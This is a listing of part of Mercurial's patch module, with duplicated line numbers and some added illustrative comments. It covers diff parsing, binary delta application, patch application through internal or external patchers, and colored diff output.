1827 1827 gitlr = linereader(fp)
1828 1828 gitlr.push(firstline)
1829 1829 gitpatches = readgitpatch(gitlr)
1830 1830 fp.seek(pos)
1831 1831 return gitpatches
1832 1832
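# For illustration (not part of the original module), the problematic
# sequence described above looks like:
#
#   diff --git a/a b/b
#   rename from a
#   rename to b
#   diff --git a/a b/c
#   copy from a
#   copy to c
#
# Applied strictly in order, the copy would fail because 'a' has already
# been renamed away, hence the up-front scan for copy/rename metadata.
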
1833 1833 def iterhunks(fp):
1834 1834 """Read a patch and yield the following events:
1835 1835 - ("file", afile, bfile, firsthunk): select a new target file.
1836 1836 - ("hunk", hunk): a new hunk is ready to be applied, follows a
1837 1837 "file" event.
1838 1838 - ("git", gitchanges): current diff is in git format, gitchanges
1839 1839 maps filenames to gitpatch records. Unique event.
1840 1840 """
1841 1841 afile = ""
1842 1842 bfile = ""
1843 1843 state = None
1844 1844 hunknum = 0
1845 1845 emitfile = newfile = False
1846 1846 gitpatches = None
1847 1847
1848 1848 # our states
1849 1849 BFILE = 1
1850 1850 context = None
1851 1851 lr = linereader(fp)
1852 1852
1853 1853 for x in iter(lr.readline, ''):
1854 1854 if state == BFILE and (
1855 1855 (not context and x.startswith('@'))
1856 1856 or (context is not False and x.startswith('***************'))
1857 1857 or x.startswith('GIT binary patch')):
1858 1858 gp = None
1859 1859 if (gitpatches and
1860 1860 gitpatches[-1].ispatching(afile, bfile)):
1861 1861 gp = gitpatches.pop()
1862 1862 if x.startswith('GIT binary patch'):
1863 1863 h = binhunk(lr, gp.path)
1864 1864 else:
1865 1865 if context is None and x.startswith('***************'):
1866 1866 context = True
1867 1867 h = hunk(x, hunknum + 1, lr, context)
1868 1868 hunknum += 1
1869 1869 if emitfile:
1870 1870 emitfile = False
1871 1871 yield 'file', (afile, bfile, h, gp and gp.copy() or None)
1872 1872 yield 'hunk', h
1873 1873 elif x.startswith('diff --git a/'):
1874 1874 m = gitre.match(x.rstrip(' \r\n'))
1875 1875 if not m:
1876 1876 continue
1877 1877 if gitpatches is None:
1878 1878 # scan whole input for git metadata
1879 1879 gitpatches = scangitpatch(lr, x)
1880 1880 yield 'git', [g.copy() for g in gitpatches
1881 1881 if g.op in ('COPY', 'RENAME')]
1882 1882 gitpatches.reverse()
1883 1883 afile = 'a/' + m.group(1)
1884 1884 bfile = 'b/' + m.group(2)
1885 1885 while gitpatches and not gitpatches[-1].ispatching(afile, bfile):
1886 1886 gp = gitpatches.pop()
1887 1887 yield 'file', ('a/' + gp.path, 'b/' + gp.path, None, gp.copy())
1888 1888 if not gitpatches:
1889 1889 raise PatchError(_('failed to synchronize metadata for "%s"')
1890 1890 % afile[2:])
1891 1891 gp = gitpatches[-1]
1892 1892 newfile = True
1893 1893 elif x.startswith('---'):
1894 1894 # check for a unified diff
1895 1895 l2 = lr.readline()
1896 1896 if not l2.startswith('+++'):
1897 1897 lr.push(l2)
1898 1898 continue
1899 1899 newfile = True
1900 1900 context = False
1901 1901 afile = parsefilename(x)
1902 1902 bfile = parsefilename(l2)
1903 1903 elif x.startswith('***'):
1904 1904 # check for a context diff
1905 1905 l2 = lr.readline()
1906 1906 if not l2.startswith('---'):
1907 1907 lr.push(l2)
1908 1908 continue
1909 1909 l3 = lr.readline()
1910 1910 lr.push(l3)
1911 1911 if not l3.startswith("***************"):
1912 1912 lr.push(l2)
1913 1913 continue
1914 1914 newfile = True
1915 1915 context = True
1916 1916 afile = parsefilename(x)
1917 1917 bfile = parsefilename(l2)
1918 1918
1919 1919 if newfile:
1920 1920 newfile = False
1921 1921 emitfile = True
1922 1922 state = BFILE
1923 1923 hunknum = 0
1924 1924
1925 1925 while gitpatches:
1926 1926 gp = gitpatches.pop()
1927 1927 yield 'file', ('a/' + gp.path, 'b/' + gp.path, None, gp.copy())
1928 1928
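# A minimal sketch of the event stream (illustrative, not part of the
# original module): for a plain unified diff touching one file,
# iterhunks() emits a single 'file' event followed by one 'hunk' event
# per hunk:
#
#   fp = stringio(b'--- a/x\n+++ b/x\n@@ -1,1 +1,1 @@\n-a\n+b\n')
#   [ev for ev, data in iterhunks(fp)]  # -> ['file', 'hunk']
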
1929 1929 def applybindelta(binchunk, data):
1930 1930 """Apply a binary delta hunk
1931 1931 The algorithm is the one from git's patch-delta.c
1932 1932 """
1933 1933 def deltahead(binchunk):
1934 1934 i = 0
1935 1935 for c in binchunk:
1936 1936 i += 1
1937 1937 if not (ord(c) & 0x80):
1938 1938 return i
1939 1939 return i
1940 1940 out = ""
1941 1941 s = deltahead(binchunk)
1942 1942 binchunk = binchunk[s:]
1943 1943 s = deltahead(binchunk)
1944 1944 binchunk = binchunk[s:]
1945 1945 i = 0
1946 1946 while i < len(binchunk):
1947 1947 cmd = ord(binchunk[i])
1948 1948 i += 1
1949 1949 if (cmd & 0x80):
1950 1950 offset = 0
1951 1951 size = 0
1952 1952 if (cmd & 0x01):
1953 1953 offset = ord(binchunk[i])
1954 1954 i += 1
1955 1955 if (cmd & 0x02):
1956 1956 offset |= ord(binchunk[i]) << 8
1957 1957 i += 1
1958 1958 if (cmd & 0x04):
1959 1959 offset |= ord(binchunk[i]) << 16
1960 1960 i += 1
1961 1961 if (cmd & 0x08):
1962 1962 offset |= ord(binchunk[i]) << 24
1963 1963 i += 1
1964 1964 if (cmd & 0x10):
1965 1965 size = ord(binchunk[i])
1966 1966 i += 1
1967 1967 if (cmd & 0x20):
1968 1968 size |= ord(binchunk[i]) << 8
1969 1969 i += 1
1970 1970 if (cmd & 0x40):
1971 1971 size |= ord(binchunk[i]) << 16
1972 1972 i += 1
1973 1973 if size == 0:
1974 1974 size = 0x10000
1975 1975 offset_end = offset + size
1976 1976 out += data[offset:offset_end]
1977 1977 elif cmd != 0:
1978 1978 offset_end = i + cmd
1979 1979 out += binchunk[i:offset_end]
1980 1980 i += cmd
1981 1981 else:
1982 1982 raise PatchError(_('unexpected delta opcode 0'))
1983 1983 return out
1984 1984
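# Worked example (illustrative): in the delta b'\x05\x05\x91\x01\x02'
# applied against source data b'hello', deltahead() skips the two
# length-header bytes (0x05, 0x05). The opcode 0x91 has the MSB set
# (copy from source); bit 0x01 requests one offset byte (1) and bit
# 0x10 one size byte (2), so the result is data[1:3]:
#
#   applybindelta(b'\x05\x05\x91\x01\x02', b'hello')  # -> 'el'
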
1985 1985 def applydiff(ui, fp, backend, store, strip=1, prefix='', eolmode='strict'):
1986 1986 """Reads a patch from fp and tries to apply it.
1987 1987
1988 1988 Returns 0 for a clean patch, -1 if any rejects were found and 1 if
1989 1989 there was any fuzz.
1990 1990
1991 1991 If 'eolmode' is 'strict', the patch content and patched file are
1992 1992 read in binary mode. Otherwise, line endings are ignored when
1993 1993 patching and then normalized according to 'eolmode'.
1994 1994 """
1995 1995 return _applydiff(ui, fp, patchfile, backend, store, strip=strip,
1996 1996 prefix=prefix, eolmode=eolmode)
1997 1997
1998 1998 def _canonprefix(repo, prefix):
1999 1999 if prefix:
2000 2000 prefix = pathutil.canonpath(repo.root, repo.getcwd(), prefix)
2001 2001 if prefix != '':
2002 2002 prefix += '/'
2003 2003 return prefix
2004 2004
2005 2005 def _applydiff(ui, fp, patcher, backend, store, strip=1, prefix='',
2006 2006 eolmode='strict'):
2007 2007 prefix = _canonprefix(backend.repo, prefix)
2008 2008 def pstrip(p):
2009 2009 return pathtransform(p, strip - 1, prefix)[1]
2010 2010
2011 2011 rejects = 0
2012 2012 err = 0
2013 2013 current_file = None
2014 2014
2015 2015 for state, values in iterhunks(fp):
2016 2016 if state == 'hunk':
2017 2017 if not current_file:
2018 2018 continue
2019 2019 ret = current_file.apply(values)
2020 2020 if ret > 0:
2021 2021 err = 1
2022 2022 elif state == 'file':
2023 2023 if current_file:
2024 2024 rejects += current_file.close()
2025 2025 current_file = None
2026 2026 afile, bfile, first_hunk, gp = values
2027 2027 if gp:
2028 2028 gp.path = pstrip(gp.path)
2029 2029 if gp.oldpath:
2030 2030 gp.oldpath = pstrip(gp.oldpath)
2031 2031 else:
2032 2032 gp = makepatchmeta(backend, afile, bfile, first_hunk, strip,
2033 2033 prefix)
2034 2034 if gp.op == 'RENAME':
2035 2035 backend.unlink(gp.oldpath)
2036 2036 if not first_hunk:
2037 2037 if gp.op == 'DELETE':
2038 2038 backend.unlink(gp.path)
2039 2039 continue
2040 2040 data, mode = None, None
2041 2041 if gp.op in ('RENAME', 'COPY'):
2042 2042 data, mode = store.getfile(gp.oldpath)[:2]
2043 2043 if data is None:
2044 2044 # This means that the old path does not exist
2045 2045 raise PatchError(_("source file '%s' does not exist")
2046 2046 % gp.oldpath)
2047 2047 if gp.mode:
2048 2048 mode = gp.mode
2049 2049 if gp.op == 'ADD':
2050 2050 # Added files without content have no hunk and
2051 2051 # must be created
2052 2052 data = ''
2053 2053 if data or mode:
2054 2054 if (gp.op in ('ADD', 'RENAME', 'COPY')
2055 2055 and backend.exists(gp.path)):
2056 2056 raise PatchError(_("cannot create %s: destination "
2057 2057 "already exists") % gp.path)
2058 2058 backend.setfile(gp.path, data, mode, gp.oldpath)
2059 2059 continue
2060 2060 try:
2061 2061 current_file = patcher(ui, gp, backend, store,
2062 2062 eolmode=eolmode)
2063 2063 except PatchError as inst:
2064 2064 ui.warn(str(inst) + '\n')
2065 2065 current_file = None
2066 2066 rejects += 1
2067 2067 continue
2068 2068 elif state == 'git':
2069 2069 for gp in values:
2070 2070 path = pstrip(gp.oldpath)
2071 2071 data, mode = backend.getfile(path)
2072 2072 if data is None:
2073 2073 # The error ignored here will trigger a getfile()
2074 2074 # error in a place more appropriate for error
2075 2075 # handling, and will not interrupt the patching
2076 2076 # process.
2077 2077 pass
2078 2078 else:
2079 2079 store.setfile(path, data, mode)
2080 2080 else:
2081 2081 raise error.Abort(_('unsupported parser state: %s') % state)
2082 2082
2083 2083 if current_file:
2084 2084 rejects += current_file.close()
2085 2085
2086 2086 if rejects:
2087 2087 return -1
2088 2088 return err
2089 2089
2090 2090 def _externalpatch(ui, repo, patcher, patchname, strip, files,
2091 2091 similarity):
2092 2092 """use <patcher> to apply <patchname> to the working directory.
2093 2093 returns whether patch was applied with fuzz factor."""
2094 2094
2095 2095 fuzz = False
2096 2096 args = []
2097 2097 cwd = repo.root
2098 2098 if cwd:
2099 2099 args.append('-d %s' % util.shellquote(cwd))
2100 2100 fp = util.popen('%s %s -p%d < %s' % (patcher, ' '.join(args), strip,
2101 2101 util.shellquote(patchname)))
2102 2102 try:
2103 2103 for line in util.iterfile(fp):
2104 2104 line = line.rstrip()
2105 2105 ui.note(line + '\n')
2106 2106 if line.startswith('patching file '):
2107 2107 pf = util.parsepatchoutput(line)
2108 2108 printed_file = False
2109 2109 files.add(pf)
2110 2110 elif line.find('with fuzz') >= 0:
2111 2111 fuzz = True
2112 2112 if not printed_file:
2113 2113 ui.warn(pf + '\n')
2114 2114 printed_file = True
2115 2115 ui.warn(line + '\n')
2116 2116 elif line.find('saving rejects to file') >= 0:
2117 2117 ui.warn(line + '\n')
2118 2118 elif line.find('FAILED') >= 0:
2119 2119 if not printed_file:
2120 2120 ui.warn(pf + '\n')
2121 2121 printed_file = True
2122 2122 ui.warn(line + '\n')
2123 2123 finally:
2124 2124 if files:
2125 2125 scmutil.marktouched(repo, files, similarity)
2126 2126 code = fp.close()
2127 2127 if code:
2128 2128 raise PatchError(_("patch command failed: %s") %
2129 2129 util.explainexit(code)[0])
2130 2130 return fuzz
2131 2131
2132 2132 def patchbackend(ui, backend, patchobj, strip, prefix, files=None,
2133 2133 eolmode='strict'):
2134 2134 if files is None:
2135 2135 files = set()
2136 2136 if eolmode is None:
2137 2137 eolmode = ui.config('patch', 'eol')
2138 2138 if eolmode.lower() not in eolmodes:
2139 2139 raise error.Abort(_('unsupported line endings type: %s') % eolmode)
2140 2140 eolmode = eolmode.lower()
2141 2141
2142 2142 store = filestore()
2143 2143 try:
2144 2144 fp = open(patchobj, 'rb')
2145 2145 except TypeError:
2146 2146 fp = patchobj
2147 2147 try:
2148 2148 ret = applydiff(ui, fp, backend, store, strip=strip, prefix=prefix,
2149 2149 eolmode=eolmode)
2150 2150 finally:
2151 2151 if fp != patchobj:
2152 2152 fp.close()
2153 2153 files.update(backend.close())
2154 2154 store.close()
2155 2155 if ret < 0:
2156 2156 raise PatchError(_('patch failed to apply'))
2157 2157 return ret > 0
2158 2158
2159 2159 def internalpatch(ui, repo, patchobj, strip, prefix='', files=None,
2160 2160 eolmode='strict', similarity=0):
2161 2161 """use builtin patch to apply <patchobj> to the working directory.
2162 2162 returns whether patch was applied with fuzz factor."""
2163 2163 backend = workingbackend(ui, repo, similarity)
2164 2164 return patchbackend(ui, backend, patchobj, strip, prefix, files, eolmode)
2165 2165
2166 2166 def patchrepo(ui, repo, ctx, store, patchobj, strip, prefix, files=None,
2167 2167 eolmode='strict'):
2168 2168 backend = repobackend(ui, repo, ctx, store)
2169 2169 return patchbackend(ui, backend, patchobj, strip, prefix, files, eolmode)
2170 2170
2171 2171 def patch(ui, repo, patchname, strip=1, prefix='', files=None, eolmode='strict',
2172 2172 similarity=0):
2173 2173 """Apply <patchname> to the working directory.
2174 2174
2175 2175 'eolmode' specifies how end of lines should be handled. It can be:
2176 2176 - 'strict': inputs are read in binary mode, EOLs are preserved
2177 2177 - 'crlf': EOLs are ignored when patching and reset to CRLF
2178 2178 - 'lf': EOLs are ignored when patching and reset to LF
2179 2179 - None: get it from user settings, default to 'strict'
2180 2180 'eolmode' is ignored when using an external patcher program.
2181 2181
2182 2182 Returns whether patch was applied with fuzz factor.
2183 2183 """
2184 2184 patcher = ui.config('ui', 'patch')
2185 2185 if files is None:
2186 2186 files = set()
2187 2187 if patcher:
2188 2188 return _externalpatch(ui, repo, patcher, patchname, strip,
2189 2189 files, similarity)
2190 2190 return internalpatch(ui, repo, patchname, strip, prefix, files, eolmode,
2191 2191 similarity)
2192 2192
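# Illustrative usage (not part of the original module): apply a patch
# file while normalizing line endings to LF and collecting the set of
# touched files:
#
#   files = set()
#   fuzz = patch(ui, repo, patchname, strip=1, files=files, eolmode='lf')
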
2193 2193 def changedfiles(ui, repo, patchpath, strip=1, prefix=''):
2194 2194 backend = fsbackend(ui, repo.root)
2195 2195 prefix = _canonprefix(repo, prefix)
2196 2196 with open(patchpath, 'rb') as fp:
2197 2197 changed = set()
2198 2198 for state, values in iterhunks(fp):
2199 2199 if state == 'file':
2200 2200 afile, bfile, first_hunk, gp = values
2201 2201 if gp:
2202 2202 gp.path = pathtransform(gp.path, strip - 1, prefix)[1]
2203 2203 if gp.oldpath:
2204 2204 gp.oldpath = pathtransform(gp.oldpath, strip - 1,
2205 2205 prefix)[1]
2206 2206 else:
2207 2207 gp = makepatchmeta(backend, afile, bfile, first_hunk, strip,
2208 2208 prefix)
2209 2209 changed.add(gp.path)
2210 2210 if gp.op == 'RENAME':
2211 2211 changed.add(gp.oldpath)
2212 2212 elif state not in ('hunk', 'git'):
2213 2213 raise error.Abort(_('unsupported parser state: %s') % state)
2214 2214 return changed
2215 2215
2216 2216 class GitDiffRequired(Exception):
2217 2217 pass
2218 2218
2219 2219 def diffallopts(ui, opts=None, untrusted=False, section='diff'):
2220 2220 '''return diffopts with all features supported and parsed'''
2221 2221 return difffeatureopts(ui, opts=opts, untrusted=untrusted, section=section,
2222 2222 git=True, whitespace=True, formatchanging=True)
2223 2223
2224 2224 diffopts = diffallopts
2225 2225
2226 2226 def difffeatureopts(ui, opts=None, untrusted=False, section='diff', git=False,
2227 2227 whitespace=False, formatchanging=False):
2228 2228 '''return diffopts with only opted-in features parsed
2229 2229
2230 2230 Features:
2231 2231 - git: git-style diffs
2232 2232 - whitespace: whitespace options like ignoreblanklines and ignorews
2233 2233 - formatchanging: options that will likely break or cause correctness issues
2234 2234 with most diff parsers
2235 2235 '''
2236 2236 def get(key, name=None, getter=ui.configbool, forceplain=None):
2237 2237 if opts:
2238 2238 v = opts.get(key)
2239 2239 # diffopts flags are either None-default (which is passed
2240 2240 # through unchanged, so we can identify unset values), or
2241 2241 # some other falsey default (eg --unified, which defaults
2242 2242 # to an empty string). We only want to override the config
2243 2243 # entries from hgrc with command line values if they
2244 2244 # appear to have been set, which means any truthy value
2245 2245 # or an explicit True or False.
2246 2246 if v or isinstance(v, bool):
2247 2247 return v
2248 2248 if forceplain is not None and ui.plain():
2249 2249 return forceplain
2250 2250 return getter(section, name or key, untrusted=untrusted)
2251 2251
2252 2252 # core options, expected to be understood by every diff parser
2253 2253 buildopts = {
2254 2254 'nodates': get('nodates'),
2255 2255 'showfunc': get('show_function', 'showfunc'),
2256 2256 'context': get('unified', getter=ui.config),
2257 2257 }
2258 2258 buildopts['worddiff'] = ui.configbool('experimental', 'worddiff')
2259 2259 buildopts['xdiff'] = ui.configbool('experimental', 'xdiff')
2260 2260
2261 2261 if git:
2262 2262 buildopts['git'] = get('git')
2263 2263
2264 2264 # since this is in the experimental section, we need to call
2265 2265 # ui.configbool directly
2266 2266 buildopts['showsimilarity'] = ui.configbool('experimental',
2267 2267 'extendedheader.similarity')
2268 2268
2269 2269 # need to inspect the ui object instead of using get() since we want to
2270 2270 # test for an int
2271 2271 hconf = ui.config('experimental', 'extendedheader.index')
2272 2272 if hconf is not None:
2273 2273 hlen = None
2274 2274 try:
2275 2275 # the hash config could be an integer (for length of hash) or a
2276 2276 # word (e.g. short, full, none)
2277 2277 hlen = int(hconf)
2278 2278 if hlen < 0 or hlen > 40:
2279 2279 msg = _("invalid length for extendedheader.index: '%d'\n")
2280 2280 ui.warn(msg % hlen)
2281 2281 except ValueError:
2282 2282 # default value
2283 2283 if hconf == 'short' or hconf == '':
2284 2284 hlen = 12
2285 2285 elif hconf == 'full':
2286 2286 hlen = 40
2287 2287 elif hconf != 'none':
2288 2288 msg = _("invalid value for extendedheader.index: '%s'\n")
2289 2289 ui.warn(msg % hconf)
2290 2290 finally:
2291 2291 buildopts['index'] = hlen
2292 2292
2293 2293 if whitespace:
2294 2294 buildopts['ignorews'] = get('ignore_all_space', 'ignorews')
2295 2295 buildopts['ignorewsamount'] = get('ignore_space_change',
2296 2296 'ignorewsamount')
2297 2297 buildopts['ignoreblanklines'] = get('ignore_blank_lines',
2298 2298 'ignoreblanklines')
2299 2299 buildopts['ignorewseol'] = get('ignore_space_at_eol', 'ignorewseol')
2300 2300 if formatchanging:
2301 2301 buildopts['text'] = opts and opts.get('text')
2302 2302 binary = None if opts is None else opts.get('binary')
2303 2303 buildopts['nobinary'] = (not binary if binary is not None
2304 2304 else get('nobinary', forceplain=False))
2305 2305 buildopts['noprefix'] = get('noprefix', forceplain=False)
2306 2306
2307 2307 return mdiff.diffopts(**pycompat.strkwargs(buildopts))
2308 2308
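# Illustrative usage (not part of the original module): a command that
# wants git-style diffs and whitespace handling, but none of the
# format-changing options, opts in to just those features (cmdopts here
# stands for the command's parsed options):
#
#   dopts = difffeatureopts(ui, opts=cmdopts, git=True, whitespace=True)
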
2309 2309 def diff(repo, node1=None, node2=None, match=None, changes=None,
2310 2310 opts=None, losedatafn=None, prefix='', relroot='', copy=None,
2311 2311 hunksfilterfn=None):
2312 2312 '''yields diff of changes to files between two nodes, or node and
2313 2313 working directory.
2314 2314
2315 2315 if node1 is None, use first dirstate parent instead.
2316 2316 if node2 is None, compare node1 with working directory.
2317 2317
2318 2318 losedatafn(**kwarg) is a callable run when opts.upgrade=True and
2319 2319 every time some change cannot be represented with the current
2320 2320 patch format. Return False to upgrade to git patch format, True to
2321 2321 accept the loss or raise an exception to abort the diff. It is
2322 2322 called with the name of the current file being diffed as 'fn'. If set
2323 2323 to None, patches will always be upgraded to git format when
2324 2324 necessary.
2325 2325
2326 2326 prefix is a filename prefix that is prepended to all filenames on
2327 2327 display (used for subrepos).
2328 2328
2329 2329 relroot, if not empty, must be normalized with a trailing /. Any match
2330 2330 patterns that fall outside it will be ignored.
2331 2331
2332 2332 copy, if not empty, should contain mappings {dst@y: src@x} of copy
2333 2333 information.
2334 2334
2335 2335 hunksfilterfn, if not None, should be a function taking a filectx and
2336 2336 hunks generator that may yield filtered hunks.
2337 2337 '''
2338 2338 for fctx1, fctx2, hdr, hunks in diffhunks(
2339 2339 repo, node1=node1, node2=node2,
2340 2340 match=match, changes=changes, opts=opts,
2341 2341 losedatafn=losedatafn, prefix=prefix, relroot=relroot, copy=copy,
2342 2342 ):
2343 2343 if hunksfilterfn is not None:
2344 2344 # If the file has been removed, fctx2 is None; but this should
2345 2345 # not occur here since we catch removed files early in
2346 2346 # logcmdutil.getlinerangerevs() for 'hg log -L'.
2347 2347 assert fctx2 is not None, \
2348 2348 'fctx2 unexpectedly None in diff hunks filtering'
2349 2349 hunks = hunksfilterfn(fctx2, hunks)
2350 2350 text = ''.join(sum((list(hlines) for hrange, hlines in hunks), []))
2351 2351 if hdr and (text or len(hdr) > 1):
2352 2352 yield '\n'.join(hdr) + '\n'
2353 2353 if text:
2354 2354 yield text
2355 2355
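# Typical consumption (illustrative): the generator yields header and
# hunk blocks as strings, so a full patch text can be assembled with:
#
#   text = ''.join(diff(repo, node1, node2, opts=diffallopts(ui)))
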
2356 2356 def diffhunks(repo, node1=None, node2=None, match=None, changes=None,
2357 2357 opts=None, losedatafn=None, prefix='', relroot='', copy=None):
2358 2358 """Yield diff of changes to files in the form of (`header`, `hunks`) tuples
2359 2359 where `header` is a list of diff headers and `hunks` is an iterable of
2360 2360 (`hunkrange`, `hunklines`) tuples.
2361 2361
2362 2362 See diff() for the meaning of parameters.
2363 2363 """
2364 2364
2365 2365 if opts is None:
2366 2366 opts = mdiff.defaultopts
2367 2367
2368 2368 if not node1 and not node2:
2369 2369 node1 = repo.dirstate.p1()
2370 2370
2371 2371 def lrugetfilectx():
2372 2372 cache = {}
2373 2373 order = collections.deque()
2374 2374 def getfilectx(f, ctx):
2375 2375 fctx = ctx.filectx(f, filelog=cache.get(f))
2376 2376 if f not in cache:
2377 2377 if len(cache) > 20:
2378 2378 del cache[order.popleft()]
2379 2379 cache[f] = fctx.filelog()
2380 2380 else:
2381 2381 order.remove(f)
2382 2382 order.append(f)
2383 2383 return fctx
2384 2384 return getfilectx
2385 2385 getfilectx = lrugetfilectx()
2386 2386
2387 2387 ctx1 = repo[node1]
2388 2388 ctx2 = repo[node2]
2389 2389
2390 2390 relfiltered = False
2391 2391 if relroot != '' and match.always():
2392 2392 # as a special case, create a new matcher with just the relroot
2393 2393 pats = [relroot]
2394 2394 match = scmutil.match(ctx2, pats, default='path')
2395 2395 relfiltered = True
2396 2396
2397 2397 if not changes:
2398 2398 changes = repo.status(ctx1, ctx2, match=match)
2399 2399 modified, added, removed = changes[:3]
2400 2400
2401 2401 if not modified and not added and not removed:
2402 2402 return []
2403 2403
2404 2404 if repo.ui.debugflag:
2405 2405 hexfunc = hex
2406 2406 else:
2407 2407 hexfunc = short
2408 2408 revs = [hexfunc(node) for node in [ctx1.node(), ctx2.node()] if node]
2409 2409
2410 2410 if copy is None:
2411 2411 copy = {}
2412 2412 if opts.git or opts.upgrade:
2413 2413 copy = copies.pathcopies(ctx1, ctx2, match=match)
2414 2414
2415 2415 if relroot is not None:
2416 2416 if not relfiltered:
2417 2417 # XXX this would ideally be done in the matcher, but that is
2418 2418 # generally meant to 'or' patterns, not 'and' them. In this case we
2419 2419 # need to 'and' all the patterns from the matcher with relroot.
2420 2420 def filterrel(l):
2421 2421 return [f for f in l if f.startswith(relroot)]
2422 2422 modified = filterrel(modified)
2423 2423 added = filterrel(added)
2424 2424 removed = filterrel(removed)
2425 2425 relfiltered = True
2426 2426 # filter out copies where either side isn't inside the relative root
2427 2427 copy = dict(((dst, src) for (dst, src) in copy.iteritems()
2428 2428 if dst.startswith(relroot)
2429 2429 and src.startswith(relroot)))
2430 2430
2431 2431 modifiedset = set(modified)
2432 2432 addedset = set(added)
2433 2433 removedset = set(removed)
2434 2434 for f in modified:
2435 2435 if f not in ctx1:
2436 2436 # Fix up added, since merged-in additions appear as
2437 2437 # modifications during merges
2438 2438 modifiedset.remove(f)
2439 2439 addedset.add(f)
2440 2440 for f in removed:
2441 2441 if f not in ctx1:
2442 2442 # Merged-in additions that are then removed are reported as removed.
2443 2443 # They are not in ctx1, so we don't want to show them in the diff.
2444 2444 removedset.remove(f)
2445 2445 modified = sorted(modifiedset)
2446 2446 added = sorted(addedset)
2447 2447 removed = sorted(removedset)
2448 2448 for dst, src in list(copy.items()):
2449 2449 if src not in ctx1:
2450 2450 # Files merged in during a merge and then copied/renamed are
2451 2451 # reported as copies. We want to show them in the diff as additions.
2452 2452 del copy[dst]
2453 2453
2454 2454 def difffn(opts, losedata):
2455 2455 return trydiff(repo, revs, ctx1, ctx2, modified, added, removed,
2456 2456 copy, getfilectx, opts, losedata, prefix, relroot)
2457 2457 if opts.upgrade and not opts.git:
2458 2458 try:
2459 2459 def losedata(fn):
2460 2460 if not losedatafn or not losedatafn(fn=fn):
2461 2461 raise GitDiffRequired
2462 2462 # Buffer the whole output until we are sure it can be generated
2463 2463 return list(difffn(opts.copy(git=False), losedata))
2464 2464 except GitDiffRequired:
2465 2465 return difffn(opts.copy(git=True), None)
2466 2466 else:
2467 2467 return difffn(opts, None)
2468 2468
2469 2469 def difflabel(func, *args, **kw):
2470 2470 '''yields 2-tuples of (output, label) based on the output of func()'''
2471 2471 inlinecolor = False
2472 2472 if kw.get(r'opts'):
2473 2473 inlinecolor = kw[r'opts'].worddiff
2474 2474 headprefixes = [('diff', 'diff.diffline'),
2475 2475 ('copy', 'diff.extended'),
2476 2476 ('rename', 'diff.extended'),
2477 2477 ('old', 'diff.extended'),
2478 2478 ('new', 'diff.extended'),
2479 2479 ('deleted', 'diff.extended'),
2480 2480 ('index', 'diff.extended'),
2481 2481 ('similarity', 'diff.extended'),
2482 2482 ('---', 'diff.file_a'),
2483 2483 ('+++', 'diff.file_b')]
2484 2484 textprefixes = [('@', 'diff.hunk'),
2485 2485 ('-', 'diff.deleted'),
2486 2486 ('+', 'diff.inserted')]
2487 2487 head = False
2488 2488 for chunk in func(*args, **kw):
2489 2489 lines = chunk.split('\n')
2490 2490 matches = {}
2491 2491 if inlinecolor:
2492 2492 matches = _findmatches(lines)
2493 2493 for i, line in enumerate(lines):
2494 2494 if i != 0:
2495 2495 yield ('\n', '')
2496 2496 if head:
2497 2497 if line.startswith('@'):
2498 2498 head = False
2499 2499 else:
2500 2500 if line and line[0] not in ' +-@\\':
2501 2501 head = True
2502 2502 stripline = line
2503 2503 diffline = False
2504 2504 if not head and line and line[0] in '+-':
2505 2505 # highlight tabs and trailing whitespace, but only in
2506 2506 # changed lines
2507 2507 stripline = line.rstrip()
2508 2508 diffline = True
2509 2509
2510 2510 prefixes = textprefixes
2511 2511 if head:
2512 2512 prefixes = headprefixes
2513 2513 for prefix, label in prefixes:
2514 2514 if stripline.startswith(prefix):
2515 2515 if diffline:
2516 2516 if i in matches:
2517 2517 for t, l in _inlinediff(lines[i].rstrip(),
2518 2518 lines[matches[i]].rstrip(),
2519 2519 label):
2520 2520 yield (t, l)
2521 2521 else:
2522 2522 for token in tabsplitter.findall(stripline):
2523 2523 if token.startswith('\t'):
2524 2524 yield (token, 'diff.tab')
2525 2525 else:
2526 2526 yield (token, label)
2527 2527 else:
2528 2528 yield (stripline, label)
2529 2529 break
2530 2530 else:
2531 2531 yield (line, '')
2532 2532 if line != stripline:
2533 2533 yield (line[len(stripline):], 'diff.trailingwhitespace')
2534 2534
2535 2535 def _findmatches(slist):
2536 2536 '''Look for insertion matches to deletions and return a dict of
2537 2537 correspondences.
2538 2538 '''
2539 2539 lastmatch = 0
2540 2540 matches = {}
2541 2541 for i, line in enumerate(slist):
2542 2542 if line == '':
2543 2543 continue
2544 2544 if line[0] == '-':
2545 2545 lastmatch = max(lastmatch, i)
2546 2546 newgroup = False
2547 2547 for j, newline in enumerate(slist[lastmatch + 1:]):
2548 2548 if newline == '':
2549 2549 continue
2550 2550 if newline[0] == '-' and newgroup: # too far, no match
2551 2551 break
2552 2552 if newline[0] == '+': # potential match
2553 2553 newgroup = True
2554 2554 sim = difflib.SequenceMatcher(None, line, newline).ratio()
2555 2555 if sim > 0.7:
2556 2556 lastmatch = lastmatch + 1 + j
2557 2557 matches[i] = lastmatch
2558 2558 matches[lastmatch] = i
2559 2559 break
2560 2560 return matches
2561 2561
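# Worked example (illustrative): a deletion followed by a sufficiently
# similar insertion (similarity ratio > 0.7) is paired in both
# directions:
#
#   _findmatches(['-foo bar', '+foo baz'])  # -> {0: 1, 1: 0}
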
2562 2562 def _inlinediff(s1, s2, operation):
2563 2563 '''Perform string diff to highlight specific changes.'''
2564 2564 operation_skip = '+?' if operation == 'diff.deleted' else '-?'
2565 2565 if operation == 'diff.deleted':
2566 2566 s2, s1 = s1, s2
2567 2567
2568 2568 buff = []
2569 2569 # we never want to highlight the leading +-
2570 2570 if operation == 'diff.deleted' and s2.startswith('-'):
2571 2571 label = operation
2572 2572 token = '-'
2573 2573 s2 = s2[1:]
2574 2574 s1 = s1[1:]
2575 2575 elif operation == 'diff.inserted' and s1.startswith('+'):
2576 2576 label = operation
2577 2577 token = '+'
2578 2578 s2 = s2[1:]
2579 2579 s1 = s1[1:]
2580 2580 else:
2581 2581 raise error.ProgrammingError("Case not expected, operation = %s" %
2582 2582 operation)
2583 2583
2584 2584 s = difflib.ndiff(_nonwordre.split(s2), _nonwordre.split(s1))
2585 2585 for part in s:
2586 2586 if part[0] in operation_skip or len(part) == 2:
2587 2587 continue
2588 2588 l = operation + '.highlight'
2589 2589 if part[0] in ' ':
2590 2590 l = operation
2591 2591 if part[2:] == '\t':
2592 2592 l = 'diff.tab'
2593 2593 if l == label: # contiguous token with same label
2594 2594 token += part[2:]
2595 2595 continue
2596 2596 else:
2597 2597 buff.append((token, label))
2598 2598 label = l
2599 2599 token = part[2:]
2600 2600 buff.append((token, label))
2601 2601
